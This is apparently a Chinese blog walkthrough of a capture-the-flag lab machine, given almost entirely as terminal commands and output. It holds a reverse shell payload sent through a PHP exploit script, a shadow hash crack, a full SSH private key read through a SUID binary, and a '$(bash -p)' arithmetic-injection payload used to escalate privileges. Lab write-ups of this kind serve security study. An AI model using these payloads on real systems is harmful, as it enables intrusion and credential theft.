本文最后更新于71 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com
一、信息收集
┌──(kali㉿kali)-[~/Desktop]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:ea:4f:b2 brd ff:ff:ff:ff:ff:ff
inet 192.168.20.32/24 brd 192.168.20.255 scope global dynamic noprefixroute eth0
valid_lft 3578sec preferred_lft 3578sec
inet6 fe80::3be4:3e0e:f3f2:8fe1/64 scope link noprefixroute
valid_lft forever preferred_lft forever
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sn 192.168.20.0/24
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-01 04:12 EDT
Nmap scan report for 192.168.20.31 (192.168.20.31)
Host is up (0.00019s latency).
MAC Address: 08:00:27:8C:4C:C6 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.20.229 (192.168.20.229)
Host is up (0.030s latency).
MAC Address: 1E:A3:33:FC:CE:96 (Unknown)
Nmap scan report for 192.168.20.253 (192.168.20.253)
Host is up (0.00015s latency).
MAC Address: 38:D5:7A:E0:D5:C1 (Cloud Network Technology Singapore PTE.)
Nmap scan report for 192.168.20.32 (192.168.20.32)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 4.54 seconds
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -p- 192.168.20.31
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-01 04:12 EDT
Nmap scan report for 192.168.20.31 (192.168.20.31)
Host is up (0.00029s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
MAC Address: 08:00:27:8C:4C:C6 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.36 seconds
二、立足点
0
──(kali㉿kali)-[~/Desktop]
└─$ cd cnext-exploits-main ┌──(kali㉿kali)-[~/Desktop/cnext-exploits-main]
└─$ vim cnext-exploit.py
┌──(kali㉿kali)-[~/Desktop/cnext-exploits-main]
└─$ /opt/p/bin/python3 cnext-exploit.py http://192.168.20.31:8080/index.php "/bin/bash -c 'bash -i >& /dev/tcp/192.168.20.32/4444 0>&1'"
[*] The data:// wrapper works
[*] The php://filter/ wrapper works
[*] The zlib extension is enabled
[+] Exploit preconditions are satisfied
[*] Using 0x7f0b5e400040 as heap
EXPLOIT SUCCESS
rlwrap nc -lvp 4444
1
┌──(kali㉿kali)-[~/Desktop/cnext-exploits-main]
└─$ cd /tmp
┌──(kali㉿kali)-[/tmp]
└─$ locate linpeas
/home/kali/.cache/vmware/drag_and_drop/LpKrwZ/linpeas.sh
/home/kali/.cache/vmware/drag_and_drop/iSaXWh/linpeas.sh
/usr/share/powershell-empire/empire/server/modules/python/situational_awareness/host/multi/linpeas.yaml
┌──(kali㉿kali)-[/tmp]
└─$ cp /home/kali/.cache/vmware/drag_and_drop/LpKrwZ/linpeas.sh .
┌──(kali㉿kali)-[/tmp]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.20.31 - - [01/May/2025 04:15:26] "GET /linpeas.sh HTTP/1.1" 200 -
2
www-data@f094e0959a50:/tmp$ wget -h
wget -h
bash: wget: command not found
www-data@f094e0959a50:/tmp$ curl -h
curl -h
Usage: curl [options...] <url>
-d, --data <data> HTTP POST data
-f, --fail Fail fast with no output on HTTP errors
-h, --help <category> Get help for commands
-i, --include Include protocol response headers in the output
-o, --output <file> Write to file instead of stdout
-O, --remote-name Write output to a file named as the remote file
-s, --silent Silent mode
-T, --upload-file <file> Transfer local FILE to destination
-u, --user <user:password> Server user and password
-A, --user-agent <name> Send User-Agent <name> to server
-v, --verbose Make the operation more talkative
-V, --version Show version number and quit
This is not the full help, this menu is stripped into categories.
Use "--help category" to get an overview of all categories.
For all options use the manual or "--help all".
www-data@f094e0959a50:/tmp$ curl http://192.168.20.32/linpeas.sh -o linpeas.sh
< curl http://192.168.20.32/linpeas.sh -o linpeas.sh
source ./linpeas.sh
......
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 138 Mar 27 2023 /usr/lib/systemd/system/dpkg-db-backup.timer
-rw-r--r-- 1 root root 147 Mar 27 2023 /usr/lib/systemd/system/dpkg-db-backup.service
-rwxr-xr-x 1 root root 2569 May 11 2023 /usr/libexec/dpkg/dpkg-db-backup
-rw-r--r-- 1 root root 568 Apr 26 08:09 /etc/shadow.bak
-rw-r--r-- 1 root root 0 Apr 8 2024 /var/lib/systemd/deb-systemd-helper-enabled/timers.target.wants/dpkg-db-backup.timer
-rw-r--r-- 1 root root 61 Apr 8 2024 /var/lib/systemd/deb-systemd-helper-enabled/dpkg-db-backup.timer.dsh-also
.........
3
┌──(kali㉿kali)-[~/Desktop]
└─$ cd /tmp
┌──(kali㉿kali)-[/tmp]
└─$ vim hash
┌──(kali㉿kali)-[/tmp]
└─$ john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
No password hashes left to crack (see FAQ)
┌──(kali㉿kali)-[/tmp]
└─$ john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt --show hash
Invalid options combination: "--show"
┌──(kali㉿kali)-[/tmp]
└─$ john --show hash
pretend:pretend:20204::::::
1 password hash cracked, 0 left
pretend:pretend4
www-data@f094e0959a50:/tmp$ su pretend
su pretend
Password: pretend
id
uid=999(pretend) gid=999(pretend) groups=999(pretend)
cd ~
ls -al
total 56
drwxr-xr-x 3 root root 4096 Apr 26 08:29 .
drwxr-xr-x 1 root root 4096 Apr 26 08:05 ..
drwx------ 2 1000 1000 4096 Apr 26 08:44 .ssh
-rwsr-x--- 1 root pretend 44016 Apr 26 08:29 cat
./cat .ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
5
┌──(kali㉿kali)-[/tmp]
└─$ vim id_rsa
┌──(kali㉿kali)-[/tmp]
└─$ ssh-keygen -y -f id_rsa > id_rsa.pub
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0664 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
┌──(kali㉿kali)-[/tmp]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[/tmp]
└─$ ssh-keygen -y -f id_rsa > id_rsa.pub
┌──(kali㉿kali)-[/tmp]
└─$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCfF2wZQFTTr+XmMjyHsMSnNwT6Fi17A2xS3ILrBy1sfHds9Wf1xReFMbySAQPrmIlds/9INlgXBDLYPETB8dKufg47+KGurQoMOh2FSU67tAHQ3lHHdf6vuwPzaJL1SYAK0DTKEbRqGcMUoBm4HbV+pS6JPh8/AIx4RrmckhH0NCNApF714UjyaElZ1vNynFQH8a+5BlNY6YIcnBtp9spH5zzFFMIMESU4+DDvEfyNltdpN7mMC9iAuhuPMSUKDZ7VCAktCoqjsI1BBsfYZuvkBqwoYhOmoIiu3Cf6uzEr+Jf2wCytvyDpBTA6a81WLhl/nVcFlPIbeioaZai8Xyr6scSmC6xI9CQPOC3wyA1md0tXjnK6+hjjaE/CfpBHJELxZp/OyXmzuLFj40vWMkBC+0eG88lTZhaT+e27B8m0+uX/1CZ5WPXyoS8S+OLWbeqxbDXjvAokkk8/ymAc1zpNpfm0X+UqejHDr8Z+Tp36sN877eE0moNlZSzXITm/YGc= welcome@moban
┌──(kali㉿kali)-[/tmp]
└─$ ssh welcome@192.168.20.31 -i id_rsa
The authenticity of host '192.168.20.31 (192.168.20.31)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:46: [hashed name]
~/.ssh/known_hosts:48: [hashed name]
~/.ssh/known_hosts:49: [hashed name]
~/.ssh/known_hosts:50: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.20.31' (ED25519) to the list of known hosts.
Linux gc 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 30 06:30:02 2025 from 192.168.20.253
welcome@gc:~$
6
welcome@gc:~$ sudo -l
Matching Defaults entries for welcome on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on localhost:
(think) NOPASSWD: /bin/bash /think/Task_Scheduler.sh
welcome@gc:~$ sudo -u think /bin/bash /think/Task_Scheduler.sh
+ Task Scheduler +
Please enter the task priority (1-10): a[$(bash -p)]
Please enter the estimated CPU usage (in percentage, 0-100):
Please enter the estimated memory usage (in MB):
think@gc:/home/welcome$
welcome@gc:~$ sudo -u think /bin/bash /think/Task_Scheduler.sh
+ Task Scheduler +
Please enter the task priority (1-10): a[$(cat /think/pass.txt)]
Please enter the estimated CPU usage (in percentage, 0-100):
Please enter the estimated memory usage (in MB):
/think/Task_Scheduler.sh: line 14: think@thinkyouare: syntax error: invalid arithmetic operator (error token is "@thinkyouare")
/think/Task_Scheduler.sh: line 15: think@thinkyouare: syntax error: invalid arithmetic operator (error token is "@thinkyouare")
Task Resource Requirements:
Adjusted CPU Usage: %
Adjusted Memory Usage: MB
Total Resource Consumption: 0
welcome@gc:~$ su think7
think@gc:/home/welcome$ dpkg -V
??5?????? c /etc/irssi.conf
??5?????? c /etc/apache2/apache2.conf
dpkg: warning: systemd: unable to open /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla for hash: Permission denied
??5?????? /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla
??5?????? c /etc/grub.d/10_linux
??5?????? c /etc/grub.d/40_custom
dpkg: warning: sudo: unable to open /etc/sudoers for hash: Permission denied
??5?????? c /etc/sudoers
dpkg: warning: sudo: unable to open /etc/sudoers.d/README for hash: Permission denied
??5?????? c /etc/sudoers.d/README
??5?????? /bin/su
??5?????? c /etc/pam.d/su
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.conf for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.conf
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.motd for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.motd
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.rules for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.rules
dpkg: warning: packagekit: unable to open /var/lib/polkit-1/localauthority/10-vendor.d/org.freedesktop.packagekit.pkla for hash: Permission denied
think@gc:/home/welcome$ grep -B 1 think /etc/pam.d/su
auth [success=ignore default=1] pam_succeed_if.so user = root
auth sufficient pam_succeed_if.so use_uid user = think
think@gc:/home/welcome$ su root
you are not think
think@gc:/home/welcome$ su root -c "id"
su: invalid option -- 'c'
Try 'su --help' for more information.
三、提权
think@gc:/home/welcome$ export PROMPT_COMMAND="id"
uid=1001(think) gid=1001(think) groups=1001(think)
think@gc:/home/welcome$ su root
uid=0(root) gid=0(root) groups=0(root)
you are not think
uid=1001(think) gid=1001(think) groups=1001(think)
